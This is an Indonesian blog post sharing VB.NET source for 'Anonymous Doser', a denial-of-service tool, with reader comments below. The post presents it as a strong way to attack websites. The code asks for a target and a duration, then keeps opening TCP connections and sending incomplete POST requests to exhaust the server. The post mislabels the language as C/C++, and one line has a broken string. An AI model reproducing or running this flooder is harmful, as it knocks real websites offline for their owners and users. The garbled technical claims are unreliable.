Code Anonymous Doser



pada menyerangan suatu website,pasti banyak yang menggunakan ddos,salah satunya anonymous Doser.anonymous doser banyak digunakan karena sangat kuat dan bagus dalam penyerangan.tetapi banyak orang berpikiran bagaimana cara membuatnya ?.apakah menggunakan bahasa pemograman batch,java,atau pyhton.jawabannya adalah anonymous doser merupakan aplikasi terminal yang dibuat menggunakan visual basic dengan bahasa pemograman C/C+++.mau tau bagaimana bentuk codenya.nih saya kasih tau


anonymous doser
bahasa pemograman : C/C++
penggunaan              : DDOS (distributed denial of service)
pembuatan                : menggunakan visual basic



Private Shared Sub Main(ByVal args As String())
    Console.ForegroundColor = ConsoleColor.Yellow
    Console.WriteLine(ChrW(10) & "             .oOo.------------.[ Anonymous DoSer ].------------.oOo." & ChrW(10))
    Console.WriteLine("                   crated by database system")
    Console.WriteLine("                     Original Source created by van1lle on HF")
    Console.WriteLine("                  problems ?chrw(10))
    Console.WriteLine("             .oOo.------------.[ Anonymous DoSer ].------------.oOo." & ChrW(10))
    Console.ForegroundColor = ConsoleColor.Magenta
    Console.Write("Website [URL/IP] : ")
    Dim website As String = Console.ReadLine
    Console.Write("Time [SECONDS] : ")
    Dim s As String = Console.ReadLine
    Console.Write(ChrW(10))
    Dim count As Integer = 1
    Dim loop As Boolean = True
    New Thread(Function
        Dim start As ThreadStart = Nothing
        Dim clients As New List(Of TcpClient)()
        Do While [loop]
            If (start Is Nothing) Then
                start = Function
                    Dim item As New TcpClient()
                    clients.Add(item)
                    Try
                        item.Connect(website, 80)
                        Dim writer As New StreamWriter(item.GetStream)
                        writer.Write(("POST / HTTP/1.1" & ChrW(13) & ChrW(10) & "Host: " & website & ChrW(13) & ChrW(10) & "Content-length: 5235" & ChrW(13) & ChrW(10) & ChrW(13) & ChrW(10)))
                        writer.Flush
                        If [loop] Then
                            Console.ForegroundColor = ConsoleColor.Green
                        End If
                        Console.WriteLine(("Server Is Up / Packets sent: " & count))
                        count += 1
                    Catch exception1 As Exception
                        If [loop] Then
                            Console.ForegroundColor = ConsoleColor.Red
                        End If
                        Console.WriteLine("DoS Succeeded, Server Down!")
                    End Try
                End Function
            End If
            New Thread(start).Start
            Thread.Sleep(50)
        Loop
        Dim client As TcpClient
        For Each client In clients
            Try
                client.GetStream.Dispose
            Catch exception1 As Exception
            End Try
        Next
    End Function).Start
    Thread.Sleep(CInt((Integer.Parse(s) * &H3E8)))
    [loop] = False
    Console.WriteLine(ChrW(10) & "DoS Completed")
    Console.WriteLine("Press any key to Close...")
    Console.ReadKey
End Sub
Previous
Next Post »

2 komentar

Click here for komentar
Unknown
admin
16 Juli 2017 pukul 08.44 ×

We are legion .. We are not forget .. We are not forgive .. Expect us .. We are anonymous ..

Reply
avatar
Unknown
admin
16 Maret 2018 pukul 12.27 ×

please take a video

Reply
avatar
Thanks for your comment